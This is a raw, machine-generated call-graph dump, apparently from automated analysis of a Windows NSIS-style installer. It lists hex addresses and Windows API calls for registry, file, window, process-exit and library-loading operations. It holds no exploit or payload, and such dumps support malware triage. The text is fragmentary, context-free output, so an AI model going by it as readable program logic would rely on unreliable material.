3235->3229 3240 402cfc 3235->3240 3237 402d75 wsprintfW 3238 405192 25 API calls 3237->3238 3239 402d92 3238->3239 3239->3229 3241 402d0b 3240->3241 3242 402d0d MulDiv 3240->3242 3241->3242 3242->3237 3932 402452 3933 402c42 19 API calls 3932->3933 3934 40245c 3933->3934 3935 402b1b 18 API calls 3934->3935 3936 402465 3935->3936 3937 402489 RegEnumValueW 3936->3937 3938 40247d RegEnumKeyW 3936->3938 3940 402791 3936->3940 3939 4024a2 RegCloseKey 3937->3939 3937->3940 3938->3939 3939->3940 3243 4022d3 3244 402303 3243->3244 3245 4022d8 3243->3245 3246 402b38 18 API calls 3244->3246 3266 402c42 3245->3266 3249 40230a 3246->3249 3248 4022df 3250 4022e9 3248->3250 3254 402320 3248->3254 3255 402b78 RegOpenKeyExW 3249->3255 3251 402b38 18 API calls 3250->3251 3252 4022f0 RegDeleteValueW RegCloseKey 3251->3252 3252->3254 3256 402c0c 3255->3256 3258 402ba3 3255->3258 3256->3254 3257 402bc9 RegEnumKeyW 3257->3258 3259 402bdb RegCloseKey 3257->3259 3258->3257 3258->3259 3261 402c00 RegCloseKey 3258->3261 3264 402b78 3 API calls 3258->3264 3270 406252 GetModuleHandleA 3259->3270 3263 402bef 3261->3263 3263->3256 3264->3258 3265 402c1b RegDeleteKeyW 3265->3263 3267 402b38 18 API calls 3266->3267 3268 402c5b 3267->3268 3269 402c69 RegOpenKeyExW 3268->3269 3269->3248 3271 406279 GetProcAddress 3270->3271 3272 40626e LoadLibraryA 3270->3272 3273 402beb 3271->3273 3272->3271 3272->3273 3273->3263 3273->3265 3942 401ed4 3943 402b38 18 API calls 3942->3943 3944 401edb 3943->3944 3945 40622b 2 API calls 3944->3945 3946 401ee1 3945->3946 3948 401ef2 3946->3948 3949 405e2f wsprintfW 3946->3949 3949->3948 3391 403c55 3392 403da8 3391->3392 3393 403c6d 3391->3393 3395 403df9 3392->3395 3396 403db9 GetDlgItem GetDlgItem 3392->3396 3393->3392 3394 403c79 3393->3394 3397 403c84 SetWindowPos 3394->3397 3398 403c97 3394->3398 3400 403e53 3395->3400 3409 401389 2 API calls 3395->3409 3399 40412d 19 API calls 3396->3399 3397->3398 3402 403cb4 3398->3402 3403 403c9c ShowWindow 3398->3403 3404 403de3 SetClassLongW 3399->3404 3401 404179 SendMessageW 3400->3401 3405 403da3 3400->3405 3432 403e65 3401->3432 3406 403cd6 3402->3406 3407 403cbc DestroyWindow 3402->3407 3403->3402 3408 40140b 2 API calls 3404->3408 3411 403cdb SetWindowLongW 3406->3411 3412 403cec 3406->3412 3410 4040b6 3407->3410 3408->3395 3413 403e2b 3409->3413 3410->3405 3420 4040e7 ShowWindow 3410->3420 3411->3405 3417 403d95 3412->3417 3418 403cf8 GetDlgItem 3412->3418 3413->3400 3414 403e2f SendMessageW 3413->3414 3414->3405 3415 40140b 2 API calls 3415->3432 3416 4040b8 DestroyWindow EndDialog 3416->3410 3419 404194 8 API calls 3417->3419 3421 403d28 3418->3421 3422 403d0b SendMessageW IsWindowEnabled 3418->3422 3419->3405 3420->3405 3424 403d35 3421->3424 3425 403d7c SendMessageW 3421->3425 3426 403d48 3421->3426 3435 403d2d 3421->3435 3422->3405 3422->3421 3423 405f0a 18 API calls 3423->3432 3424->3425 3424->3435 3425->3417 3429 403d50 3426->3429 3430 403d65 3426->3430 3427 404106 SendMessageW 3431 403d63 3427->3431 3428 40412d 19 API calls 3428->3432 3464 40140b 3429->3464 3434 40140b 2 API calls 3430->3434 3431->3417 3432->3405 3432->3415 3432->3416 3432->3423 3432->3428 3437 40412d 19 API calls 3432->3437 3452 403ff8 DestroyWindow 3432->3452 3436 403d6c 3434->3436 3435->3427 3436->3417 3436->3435 3438 403ee0 GetDlgItem 3437->3438 3439 403ef5 3438->3439 3440 403efd ShowWindow KiUserCallbackDispatcher 3438->3440 3439->3440 3461 40414f KiUserCallbackDispatcher 3440->3461 3442 403f27 EnableWindow 3445 403f3b 3442->3445 3443 403f40 GetSystemMenu EnableMenuItem SendMessageW 3444 403f70 SendMessageW 3443->3444 3443->3445 3444->3445 3445->3443 3462 404162 SendMessageW 3445->3462 3463 405ee8 lstrcpynW 3445->3463 3448 403f9e lstrlenW 3449 405f0a 18 API calls 3448->3449 3450 403fb4 SetWindowTextW 3449->3450 3451 401389 2 API calls 3450->3451 3451->3432 3452->3410 3453 404012 CreateDialogParamW 3452->3453 3453->3410 3454 404045 3453->3454 3455 40412d 19 API calls 3454->3455 3456 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3455->3456 3457 401389 2 API calls 3456->3457 3458 404096 3457->3458 3458->3405 3459 40409e ShowWindow 3458->3459 3460 404179 SendMessageW 3459->3460 3460->3410 3461->3442 3462->3445 3463->3448 3465 401389 2 API calls 3464->3465 3466 401420 3465->3466 3466->3435 3950 4014d7 3951 402b1b 18 API calls 3950->3951 3952 4014dd Sleep 3951->3952 3954 4029c5 3952->3954 3478 403358 #17 SetErrorMode OleInitialize 3479 406252 3 API calls 3478->3479 3480 40339b SHGetFileInfoW 3479->3480 3551 405ee8 lstrcpynW 3480->3551 3482 4033c6 GetCommandLineW 3552 405ee8 lstrcpynW 3482->3552 3484 4033d8 GetModuleHandleW 3485 4033f0 3484->3485 3486 405960 CharNextW 3485->3486 3487 4033ff CharNextW 3486->3487 3489 40340f 3487->3489 3488 4034e4 3490 4034f8 GetTempPathW 3488->3490 3489->3488 3489->3489 3493 405960 CharNextW 3489->3493 3501 4034e6 3489->3501 3553 403324 3490->3553 3492 403510 3494 403514 GetWindowsDirectoryW lstrcatW 3492->3494 3495 40356a DeleteFileW 3492->3495 3493->3489 3496 403324 11 API calls 3494->3496 3561 402dba GetTickCount GetModuleFileNameW 3495->3561 3498 403530 3496->3498 3498->3495 3500 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3498->3500 3499 40357e 3502 403616 3499->3502 3504 403606 3499->3504 3508 405960 CharNextW 3499->3508 3503 403324 11 API calls 3500->3503 3645 405ee8 lstrcpynW 3501->3645 3648 4037c0 3502->3648 3507 403562 3503->3507 3591 4038b2 3504->3591 3507->3495 3507->3502 3511 403599 3508->3511 3517 4035e0 3511->3517 3518 403645 lstrcatW lstrcmpiW 3511->3518 3512 403725 3515 4037a8 ExitProcess 3512->3515 3519 406252 3 API calls 3512->3519 3513 40362f 3514 4056c4 MessageBoxIndirectW 3513->3514 3516 40363d ExitProcess 3514->3516 3521 405a3b 18 API calls 3517->3521 3518->3502 3522 403661 CreateDirectoryW SetCurrentDirectoryW 3518->3522 3523 403734 3519->3523 3524 4035ec 3521->3524 3525 403684 3522->3525 3526 403679 3522->3526 3527 406252 3 API calls 3523->3527 3524->3502 3646 405ee8 lstrcpynW 3524->3646 3658 405ee8 lstrcpynW 3525->3658 3657 405ee8 lstrcpynW 3526->3657 3530 40373d 3527->3530 3532 406252 3 API calls 3530->3532 3533 403746 3532->3533 3535 403794 ExitWindowsEx 3533->3535 3540 403754 GetCurrentProcess 3533->3540 3534 4035fb 3647 405ee8 lstrcpynW 3534->3647 3535->3515 3538 4037a1 3535->3538 3537 405f0a 18 API calls 3539 4036c3 DeleteFileW 3537->3539 3541 40140b 2 API calls 3538->3541 3542 4036d0 CopyFileW 3539->3542 3548 403692 3539->3548 3544 403764 3540->3544 3541->3515 3542->3548 3543 403719 3545 405d82 40 API calls 3543->3545 3544->3535 3545->3502 3546 405d82 40 API calls 3546->3548 3547 405f0a 18 API calls 3547->3548 3548->3537 3548->3543 3548->3546 3548->3547 3549 405663 2 API calls 3548->3549 3550 403704 CloseHandle 3548->3550 3549->3548 3550->3548 3551->3482 3552->3484 3554 40617c 5 API calls 3553->3554 3555 403330 3554->3555 3556 40333a 3555->3556 3557 405933 3 API calls 3555->3557 3556->3492 3558 403342 CreateDirectoryW 3557->3558 3659 405b83 3558->3659 3663 405b54 GetFileAttributesW CreateFileW 3561->3663 3563 402dfd 3590 402e0a 3563->3590 3664 405ee8 lstrcpynW 3563->3664 3565 402e20 3566 40597f 2 API calls 3565->3566 3567 402e26 3566->3567 3665 405ee8 lstrcpynW 3567->3665 3569 402e31 GetFileSize 3570 402f32 3569->3570 3572 402e48 3569->3572 3571 402d18 33 API calls 3570->3571 3574 402f39 3571->3574 3572->3570 3573 4032f7 ReadFile 3572->3573 3575 402fcd 3572->3575 3581 402d18 33 API calls 3572->3581 3572->3590 3573->3572 3576 402f75 GlobalAlloc 3574->3576 3574->3590 3667 40330d SetFilePointer 3574->3667 3578 402d18 33 API calls 3575->3578 3577 402f8c 3576->3577 3582 405b83 2 API calls 3577->3582 3578->3590 3580 402f56 3583 4032f7 ReadFile 3580->3583 3581->3572 3585 402f9d CreateFileW 3582->3585 3584 402f61 3583->3584 3584->3576 3584->3590 3586 402fd7 3585->3586 3585->3590 3666 40330d SetFilePointer 3586->3666 3588 402fe5 3589 403060 46 API calls 3588->3589 3589->3590 3590->3499 3590->3590 3592 406252 3 API calls 3591->3592 3593 4038c6 3592->3593 3594 4038cc 3593->3594 3595 4038de 3593->3595 3677 405e2f wsprintfW 3594->3677 3596 405db5 3 API calls 3595->3596 3597 40390e 3596->3597 3599 40392d lstrcatW 3597->3599 3601 405db5 3 API calls 3597->3601 3600 4038dc 3599->3600 3668 403b88 3600->3668 3601->3599 3604 405a3b 18 API calls 3605 40395f 3604->3605 3606 4039f3 3605->3606 3609 405db5 3 API calls 3605->3609 3607 405a3b 18 API calls 3606->3607 3608 4039f9 3607->3608 3611 403a09 LoadImageW 3608->3611 3612 405f0a 18 API calls 3608->3612 3610 403991 3609->3610 3610->3606 3615 4039b2 lstrlenW 3610->3615 3619 405960 CharNextW 3610->3619 3613 403a30 RegisterClassW 3611->3613 3614 403aaf 3611->3614 3612->3611 3616 403a66 SystemParametersInfoW CreateWindowExW 3613->3616 3617 403ab9 3613->3617 3618 40140b 2 API calls 3614->3618 3620 4039c0 lstrcmpiW 3615->3620 3621 4039e6 3615->3621 3616->3614 3617->3502 3622 403ab5 3618->3622 3623 4039af 3619->3623 3620->3621 3624 4039d0 GetFileAttributesW 3620->3624 3625 405933 3 API calls 3621->3625 3622->3617 3627 403b88 19 API calls 3622->3627 3623->3615 3626 4039dc 3624->3626 3628 4039ec 3625->3628 3626->3621 3629 40597f 2 API calls 3626->3629 3630 403ac6 3627->3630 3678 405ee8 lstrcpynW 3628->3678 3629->3621 3632 403ad2 ShowWindow LoadLibraryW 3630->3632 3633 403b55 3630->3633 3635 403af1 LoadLibraryW 3632->3635 3636 403af8 GetClassInfoW 3632->3636 3634 405265 5 API calls 3633->3634 3639 403b5b 3634->3639 3635->3636 3637 403b22 DialogBoxParamW 3636->3637 3638 403b0c GetClassInfoW RegisterClassW 3636->3638 3640 40140b 2 API calls 3637->3640 3638->3637 3641 403b77 3639->3641 3642 403b5f 3639->3642 3640->3617 3643 40140b 2 API calls 3641->3643 3642->3617 3644 40140b 2 API calls 3642->3644 3643->3617 3644->3617 3645->3490 3646->3534 3647->3504 3649 4037d1 CloseHandle 3648->3649 3650 4037db 3648->3650 3649->3650 3651 4037e5 CloseHandle 3650->3651 3652 4037ef 3650->3652 3651->3652 3680 40381d 3652->3680 3655 405770 71 API calls 3656 40361f OleUninitialize 3655->3656 3656->3512 3656->3513 3657->3525 3658->3548 3660 405b90 GetTickCount GetTempFileNameW 3659->3660 3661 405bc6 3660->3661 3662 403356 3660->3662 3661->3660 3661->3662 3662->3492 3663->3563 3664->3565 3665->3569 3666->3588 3667->3580 3669 403b9c 3668->3669 3679 405e2f wsprintfW 3669->3679 3671 403c0d 3672 405f0a 18 API calls 3671->3672 3673 403c19 SetWindowTextW 3672->3673 3674 40393d 3673->3674 3675 403c35 3673->3675 3674->3604 3675->3674 3676 405f0a 18 API calls 3675->3676 3676->3675 3677->3600 3678->3606 3679->3671 3681 40382b 3680->3681 3682 403830 FreeLibrary GlobalFree 3681->3682 3683 4037f4 3681->3683 3682->3682 3682->3683 3683->3655 3955 40155b 3956 40296b 3955->3956 3959 405e2f wsprintfW 3956->3959 3958 402970 3959->3958 3967 4023de 3968 402c42 19 API calls 3967->3968 3969 4023e8 3968->3969 3970 402b38 18 API calls 3969->3970 3971 4023f1 3970->3971 3972 4023fc RegQueryValueExW 3971->3972 3976 402791 3971->3976 3973 402422 RegCloseKey 3972->3973 3974 40241c 3972->3974 3973->3976 3974->3973 3978 405e2f wsprintfW 3974->3978 3978->3973 3979 401ce5 GetDlgItem GetClientRect 3980 402b38 18 API calls 3979->3980 3981 401d17 LoadImageW SendMessageW 3980->3981 3982 401d35 DeleteObject 3981->3982 3983 4029c5 3981->3983 3982->3983 3984 40206a 3985 402b38 18 API calls 3984->3985 3986 402071 3985->3986 3987 402b38 18 API calls 3986->3987 3988 40207b 3987->3988 3989 402b38 18 API calls 3988->3989 3990 402084 3989->3990 3991 402b38 18 API calls 3990->3991 3992 40208e 3991->3992 3993 402b38 18 API calls 3992->3993 3994 402098 3993->3994 3995 4020ac CoCreateInstance 3994->3995 3996 402b38 18 API calls 3994->3996 3999 4020cb 3995->3999 3996->3995 3997 401423 25 API calls 3998 402195 3997->3998 3999->3997 3999->3998 4000 40156b 4001 401584 4000->4001 4002 40157b ShowWindow 4000->4002 4003 401592 ShowWindow 4001->4003 4004 4029c5 4001->4004 4002->4001 4003->4004 4005 4024ec 4006 4024f1 4005->4006 4007 40250a 4005->4007 4008 402b1b 18 API calls 4006->4008 4009 402510 4007->4009 4010 40253c 4007->4010 4013 4024f8 4008->4013 4011 402b38 18 API calls 4009->4011 4012 402b38 18 API calls 4010->4012 4014 402517 WideCharToMultiByte lstrlenA 4011->4014 4015 402543 lstrlenW 4012->4015 4016 402791 4013->4016 4017 402565 WriteFile 4013->4017 4014->4013 4015->4013 4017->4016 4018 40276e 4019 402b38 18 API calls 4018->4019 4020 402775 FindFirstFileW 4019->4020 4021 40279d 4020->4021 4025 402788 4020->4025 4023 4027a6 4021->4023 4026 405e2f wsprintfW 4021->4026 4027 405ee8 lstrcpynW 4023->4027 4026->4023 4027->4025 4028 4018ef 4029 401926 4028->4029 4030 402b38 18 API calls 4029->4030 4031 40192b 4030->4031 4032 405770 71 API calls 4031->4032 4033 401934 4032->4033 4034 403870 4035 40387b 4034->4035 4036 403882 GlobalAlloc 4035->4036 4037 40387f 4035->4037 4036->4037 4038 402571 4039 402b1b 18 API calls 4038->4039 4043 402580 4039->4043 4040 40269e 4041 4025c6 ReadFile 4041->4040 4041->4043 4042 405bd7 ReadFile 4042->4043 4043->4040 4043->4041 4043->4042 4044 4026a0 4043->4044 4045 402606 MultiByteToWideChar 4043->4045 4047 40262c SetFilePointer MultiByteToWideChar 4043->4047 4048 4026b1 4043->4048 4050 405e2f wsprintfW 4044->4050 4045->4043 4047->4043 4048->4040 4049 4026d2 SetFilePointer 4048->4049 4049->4040 4050->4040 4051 4014f1 SetForegroundWindow 4052 4029c5 4051->4052 4060 4018f2 4061 402b38 18 API calls 4060->4061 4062 4018f9 4061->4062 4063 4056c4 MessageBoxIndirectW 4062->4063 4064 401902 4063->4064 4072 401df3 4073 402b38 18 API calls 4072->4073 4074 401df9 4073->4074 4075 402b38 18 API calls 4074->4075 4076 401e02 4075->4076 4077 402b38 18 API calls 4076->4077 4078 401e0b 4077->4078 4079 402b38 18 API calls 4078->4079 4080 401e14 4079->4080 4081 401423 25 API calls 4080->4081 4082 401e1b ShellExecuteW 4081->4082 4083 401e4c 4082->4083 4089 4026f7 4090 4026fe 4089->4090 4092 402970 4089->4092 4091 402b1b 18 API calls 4090->4091 4093 402709 4091->4093 4094 402710 SetFilePointer 4093->4094 4094->4092 4095 402720 4094->4095 4097 405e2f wsprintfW 4095->4097 4097->4092 4105 40427b lstrlenW 4106 40429a 4105->4106 4107 40429c WideCharToMultiByte 4105->4107 4106->4107 4108 402c7d 4109 402ca8 4108->4109 4110 402c8f SetTimer 4108->4110 4111 402cf6 4109->4111 4112 402cfc MulDiv 4109->4112 4110->4109 4113 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 4112->4113 4113->4111 4115 4014ff 4116 401507 4115->4116 4118 40151a 4115->4118 4117 402b1b 18 API calls 4116->4117 4117->4118 4119 401000 4120 401037 BeginPaint GetClientRect 4119->4120 4121 40100c DefWindowProcW 4119->4121 4123 4010f3 4120->4123 4124 401179 4121->4124 4125 401073 CreateBrushIndirect FillRect DeleteObject 4123->4125 4126 4010fc 4123->4126 4125->4123 4127 401102 CreateFontIndirectW 4126->4127 4128 401167 EndPaint 4126->4128 4127->4128 4129 401112 6 API calls 4127->4129 4128->4124 4129->4128 4130 401a00 4131 402b38 18 API calls 4130->4131 4132 401a09 ExpandEnvironmentStringsW 4131->4132 4133 401a1d 4132->4133 4135 401a30 4132->4135 4134 401a22 lstrcmpW 4133->4134 4133->4135 4134->4135 4136 401b01 4137 402b38 18 API calls 4136->4137 4138 401b08 4137->4138 4139 402b1b 18 API calls 4138->4139 4140 401b11 wsprintfW 4139->4140 4141 4029c5 4140->4141 4142 404581 4143 404591 4142->4143 4144 4045b7 4142->4144 4145 40412d 19 API calls 4143->4145 4146 404194 8 API calls 4144->4146 4147 40459e SetDlgItemTextW 4145->4147 4148 4045c3 4146->4148 4147->4144 4149 405106 4150 405116 4149->4150 4151 40512a 4149->4151 4152 405173 4150->4152 4153 40511c 4150->4153 4154 405132 IsWindowVisible 4151->4154 4160 405149 4151->4160 4155 405178 CallWindowProcW 4152->4155 4156 404179 SendMessageW 4153->4156 4154->4152 4157 40513f 4154->4157 4158 405126 4155->4158 4156->4158 4162 404a5c SendMessageW 4157->4162 4160->4155 4167 404adc 4160->4167 4163 404abb SendMessageW 4162->4163 4164 404a7f GetMessagePos ScreenToClient SendMessageW 4162->4164 4165 404ab3 4163->4165 4164->4165 4166 404ab8 4164->4166 4165->4160 4166->4163 4176 405ee8 lstrcpynW 4167->4176 4169 404aef 4177 405e2f wsprintfW 4169->4177 4171 404af9 4172 40140b 2 API calls 4171->4172 4173 404b02 4172->4173 4178 405ee8 lstrcpynW 4173->4178 4175 404b09 4175->4152 4176->4169 4177->4171 4178->4175 4179 401f08 4180 402b38 18 API calls 4179->4180 4181 401f0f GetFileVersionInfoSizeW 4180->4181 4182 401f8c 4181->4182 4183 401f36 GlobalAlloc 4181->4183 4183->4182 4184 401f4a GetFileVersionInfoW 4183->4184 4184->4182 4185 401f59 VerQueryValueW 4184->4185 4185->4182 4186 401f72 4185->4186 4190 405e2f wsprintfW 4186->4190 4188 401f7e 4191 405e2f wsprintfW 4188->4191 4190->4188 4191->4182 4199 404b0e GetDlgItem GetDlgItem 4200 404b60 7 API calls 4199->4200 4207 404d79 4199->4207 4201 404c03 DeleteObject 4200->4201 4202 404bf6 SendMessageW 4200->4202 4203 404c0c 4201->4203 4202->4201 4204 404c43 4203->4204 4206 405f0a 18 API calls 4203->4206 4208 40412d 19 API calls 4204->4208 4205 404e5d 4209 404f09 4205->4209 4218 404eb6 SendMessageW 4205->4218 4242 404d6c 4205->4242 4210 404c25 SendMessageW SendMessageW 4206->4210 4207->4205 4216 404a5c 5 API calls 4207->4216 4228 404dea 4207->4228 4213 404c57 4208->4213 4211 404f13 SendMessageW 4209->4211 4212 404f1b 4209->4212 4210->4203 4211->4212 4220 404f34 4212->4220 4221 404f2d ImageList_Destroy 4212->4221 4229 404f44 4212->4229 4217 40412d 19 API calls 4213->4217 4214 404194 8 API calls 4219 4050ff 4214->4219 4215 404e4f SendMessageW 4215->4205 4216->4228 4233 404c65 4217->4233 4223 404ecb SendMessageW 4218->4223 4218->4242 4224 404f3d GlobalFree 4220->4224 4220->4229 4221->4220 4222 4050b3 4230 4050c5 ShowWindow GetDlgItem ShowWindow 4222->4230 4222->4242 4226 404ede 4223->4226 4224->4229 4225 404d3a GetWindowLongW SetWindowLongW 4227 404d53 4225->4227 4234 404eef SendMessageW 4226->4234 4231 404d71 4227->4231 4232 404d59 ShowWindow 4227->4232 4228->4205 4228->4215 4229->4222 4241 404adc 4 API calls 4229->4241 4244 404f7f 4229->4244 4230->4242 4251 404162 SendMessageW 4231->4251 4250 404162 SendMessageW 4232->4250 4233->4225 4235 404d34 4233->4235 4238 404cb5 SendMessageW 4233->4238 4239 404cf1 SendMessageW 4233->4239 4240 404d02 SendMessageW 4233->4240 4234->4209 4235->4225 4235->4227 4238->4233 4239->4233 4240->4233 4241->4244 4242->4214 4243 405089 InvalidateRect 4243->4222 4245 40509f 4243->4245 4246 404fad SendMessageW 4244->4246 4247 404fc3 4244->4247 4248 404976 21 API calls 4245->4248 4246->4247 4247->4243 4249 405037 SendMessageW SendMessageW 4247->4249 4248->4222 4249->4247 4250->4242 4251->4207 4252 404910 4253 404920 4252->4253 4254 40493c 4252->4254 4263 4056a8 GetDlgItemTextW 4253->4263 4256 404942 SHGetPathFromIDListW 4254->4256 4257 40496f 4254->4257 4259 404959 SendMessageW 4256->4259 4260 404952 4256->4260 4258 40492d SendMessageW 4258->4254 4259->4257 4262 40140b 2 API calls 4260->4262 4262->4259 4263->4258 4264 401491 4265 405192 25 API calls 4264->4265 4266 401498 4265->4266 4267 402293 4268 402b38 18 API calls 4267->4268 4269 4022a2 4268->4269 4270 402b38 18 API calls 4269->4270 4271 4022ab 4270->4271 4272 402b38 18 API calls 4271->4272 4273 4022b5 GetPrivateProfileStringW 4272->4273 4274 401718 4275 402b38 18 API calls 4274->4275 4276 40171f SearchPathW 4275->4276 4277 40173a 4276->4277 4278 401f98 4279 401faa 4278->4279 4289 40205c 4278->4289 4280 402b38 18 API calls 4279->4280 4282 401fb1 4280->4282 4281 401423 25 API calls 4287 402195 4281->4287 4283 402b38 18 API calls 4282->4283 4284 401fba 4283->4284 4285 401fd0 LoadLibraryExW 4284->4285 4286 401fc2 GetModuleHandleW 4284->4286 4288 401fe1 4285->4288 4285->4289 4286->4285 4286->4288 4298 4062be WideCharToMultiByte 4288->4298 4289->4281 4292 401ff2 4295 401423 25 API calls 4292->4295 4296 402002 4292->4296 4293 40202b 4294 405192 25 API calls 4293->4294 4294->4296 4295->4296 4296->4287 4297 40204e FreeLibrary 4296->4297 4297->4287 4299 4062e8 GetProcAddress 4298->4299 4300 401fec 4298->4300 4299->4300 4300->4292 4300->4293 3706 40159b 3707 402b38 18 API calls 3706->3707 3708 4015a2 SetFileAttributesW 3707->3708 3709 4015b4 3708->3709 4301 40149e 4302 40223c 4301->4302 4303 4014ac PostQuitMessage 4301->4303 4303->4302 4304 40219e 4305 402b38 18 API calls 4304->4305 4306 4021a4 4305->4306 4307 402b38 18 API calls 4306->4307 4308 4021ad 4307->4308 4309 402b38 18 API calls 4308->4309 4310 4021b6 4309->4310 4311 40622b 2 API calls 4310->4311 4312 4021bf 4311->4312 4313 4021d0 lstrlenW lstrlenW 4312->4313 4314 4021c3 4312->4314 4316 405192 25 API calls 4313->4316 4315 405192 25 API calls 4314->4315 4317 4021cb 4314->4317 4315->4317 4318 40220e SHFileOperationW 4316->4318 4318->4314 4318->4317 4319 4029a0 SendMessageW 4320 4029c5 4319->4320 4321 4029ba InvalidateRect 4319->4321 4321->4320 4329 401b22 4330 401b73 4329->4330 4331 401b2f 4329->4331 4333 401b78 4330->4333 4334 401b9d GlobalAlloc 4330->4334 4332 402229 4331->4332 4338 401b46 4331->4338 4335 405f0a 18 API calls 4332->4335 4343 401bb8 4333->4343 4350 405ee8 lstrcpynW 4333->4350 4336 405f0a 18 API calls 4334->4336 4337 402236 4335->4337 4336->4343 4344 4056c4 MessageBoxIndirectW 4337->4344 4348 405ee8 lstrcpynW 4338->4348 4341 401b8a GlobalFree 4341->4343 4342 401b55 4349 405ee8 lstrcpynW 4342->4349 4344->4343 4346 401b64 4351 405ee8 lstrcpynW 4346->4351 4348->4342 4349->4346 4350->4341 4351->4343 4352 402222 4353 402229 4352->4353 4356 40223c 4352->4356 4354 405f0a 18 API calls 4353->4354 4355 402236 4354->4355 4357 4056c4 MessageBoxIndirectW 4355->4357 4357->4356 3274 401924 3275 401926 3274->3275 3276 402b38 18 API calls 3275->3276 3277 40192b 3276->3277 3280 405770 3277->3280 3319 405a3b 3280->3319 3283 405798 DeleteFileW 3290 401934 3283->3290 3285 4057af 3286 4058cf 3285->3286 3333 405ee8 lstrcpynW 3285->3333 3286->3290 3293 40622b 2 API calls 3286->3293 3287 4057d5 3288 4057e8 3287->3288 3289 4057db lstrcatW 3287->3289 3334 40597f lstrlenW 3288->3334 3291 4057ee 3289->3291 3294 4057fe lstrcatW 3291->3294 3296 405809 lstrlenW FindFirstFileW 3291->3296 3295 4058f4 3293->3295 3294->3296 3295->3290 3297 4058f8 3295->3297 3296->3286 3305 40582b 3296->3305 3298 405933 3 API calls 3297->3298 3299 4058fe 3298->3299 3301 405728 5 API calls 3299->3301 3300 4058b2 FindNextFileW 3303 4058c8 FindClose 3300->3303 3300->3305 3304 40590a 3301->3304 3303->3286 3306 405924 3304->3306 3307 40590e 3304->3307 3305->3300 3314 405873 3305->3314 3338 405ee8 lstrcpynW 3305->3338 3309 405192 25 API calls 3306->3309 3307->3290 3310 405192 25 API calls 3307->3310 3309->3290 3312 40591b 3310->3312 3311 405770 64 API calls 3311->3314 3313 405d82 40 API calls 3312->3313 3316 405922 3313->3316 3314->3300 3314->3311 3315 405192 25 API calls 3314->3315 3317 405192 25 API calls 3314->3317 3339 405728 3314->3339 3347 405d82 3314->3347 3315->3300 3316->3290 3317->3314 3352 405ee8 lstrcpynW 3319->3352 3321 405a4c 3353 4059de CharNextW CharNextW 3321->3353 3324 405790 3324->3283 3324->3285 3325 40617c 5 API calls 3328 405a62 3325->3328 3326 405a93 lstrlenW 3327 405a9e 3326->3327 3326->3328 3330 405933 3 API calls 3327->3330 3328->3324 3328->3326 3329 40622b 2 API calls 3328->3329 3332 40597f 2 API calls 3328->3332 3329->3328 3331 405aa3 GetFileAttributesW 3330->3331 3331->3324 3332->3326 3333->3287 3335 40598d 3334->3335 3336 405993 CharPrevW 3335->3336 3337 40599f 3335->3337 3336->3335 3336->3337 3337->3291 3338->3305 3340 405b2f 2 API calls 3339->3340 3341 405734 3340->3341 3342 405743 RemoveDirectoryW 3341->3342 3343 40574b DeleteFileW 3341->3343 3345 405755 3341->3345 3344 405751 3342->3344 3343->3344 3344->3345 3346 405761 SetFileAttributesW 3344->3346 3345->3314 3346->3345 3348 406252 3 API calls 3347->3348 3349 405d89 3348->3349 3351 405daa 3349->3351 3359 405c06 lstrcpyW 3349->3359 3351->3314 3352->3321 3354 4059fb 3353->3354 3358 405a0d 3353->3358 3356 405a08 CharNextW 3354->3356 3354->3358 3355 405a31 3355->3324 3355->3325 3356->3355 3357 405960 CharNextW 3357->3358 3358->3355 3358->3357 3360 405c55 GetShortPathNameW 3359->3360 3361 405c2f 3359->3361 3363 405c6a 3360->3363 3364 405d7c 3360->3364 3384 405b54 GetFileAttributesW CreateFileW 3361->3384 3363->3364 3366 405c72 wsprintfA 3363->3366 3364->3351 3365 405c39 CloseHandle GetShortPathNameW 3365->3364 3367 405c4d 3365->3367 3368 405f0a 18 API calls 3366->3368 3367->3360 3367->3364 3369 405c9a 3368->3369 3385 405b54 GetFileAttributesW CreateFileW 3369->3385 3371 405ca7 3371->3364 3372 405cb6 GetFileSize GlobalAlloc 3371->3372 3373 405d75 CloseHandle 3372->3373 3374 405cd8 3372->3374 3373->3364 3375 405bd7 ReadFile 3374->3375 3376 405ce0 3375->3376 3376->3373 3386 405ab9 lstrlenA 3376->3386 3379 405cf7 lstrcpyA 3382 405d19 3379->3382 3380 405d0b 3381 405ab9 4 API calls 3380->3381 3381->3382 3383 405d50 SetFilePointer WriteFile GlobalFree 3382->3383 3383->3373 3384->3365 3385->3371 3387 405afa lstrlenA 3386->3387 3388 405b02 3387->3388 3389 405ad3 lstrcmpiA 3387->3389 3388->3379 3388->3380 3389->3388 3390 405af1 CharNextA 3389->3390 3390->3387 4358 402727 4359 4029c5 4358->4359 4360 40272e 4358->4360 4361 402734 FindClose 4360->4361 4361->4359 4362 401cab 4363 402b1b 18 API calls 4362->4363 4364 401cb2 4363->4364 4365 402b1b 18 API calls 4364->4365 4366 401cba GetDlgItem 4365->4366 4367 4024e6 4366->4367 3710 40232f 3711 402335 3710->3711 3712 402b38 18 API calls 3711->3712 3713 402347 3712->3713 3714 402b38 18 API calls 3713->3714 3715 402351 RegCreateKeyExW 3714->3715 3716 402791 3715->3716 3717 40237b 3715->3717 3718 402396 3717->3718 3719 402b38 18 API calls 3717->3719 3720 4023a2 3718->3720 3722 402b1b 18 API calls 3718->3722 3721 40238c lstrlenW 3719->3721 3723 4023bd RegSetValueExW 3720->3723 3724 403060 46 API calls 3720->3724 3721->3718 3722->3720 3725 4023d3 RegCloseKey 3723->3725 3724->3723 3725->3716 4368 4016af 4369 402b38 18 API calls 4368->4369 4370 4016b5 GetFullPathNameW 4369->4370 4371 4016cf 4370->4371 4377 4016f1 4370->4377 4374 40622b 2 API calls 4371->4374 4371->4377 4372 4029c5 4373 401706 GetShortPathNameW 4373->4372 4375 4016e1 4374->4375 4375->4377 4378 405ee8 lstrcpynW 4375->4378 4377->4372 4377->4373 4378->4377 4379 406c30 4382 4063c1 4379->4382 4380 406442 GlobalFree 4381 40644b GlobalAlloc 4380->4381 4381->4382 4383 406d2c 4381->4383 4382->4380 4382->4381 4382->4382 4382->4383 4384 4064c2 GlobalAlloc 4382->4384 4385 4064b9 GlobalFree 4382->4385 4384->4382 4384->4383 4385->4384 4386 4027b3 4387 402b38 18 API calls 4386->4387 4388 4027c1 4387->4388 4389 4027d7 4388->4389 4390 402b38 18 API calls 4388->4390 4391 405b2f 2 API calls 4389->4391 4390->4389 4392 4027dd 4391->4392 4412 405b54 GetFileAttributesW CreateFileW 4392->4412 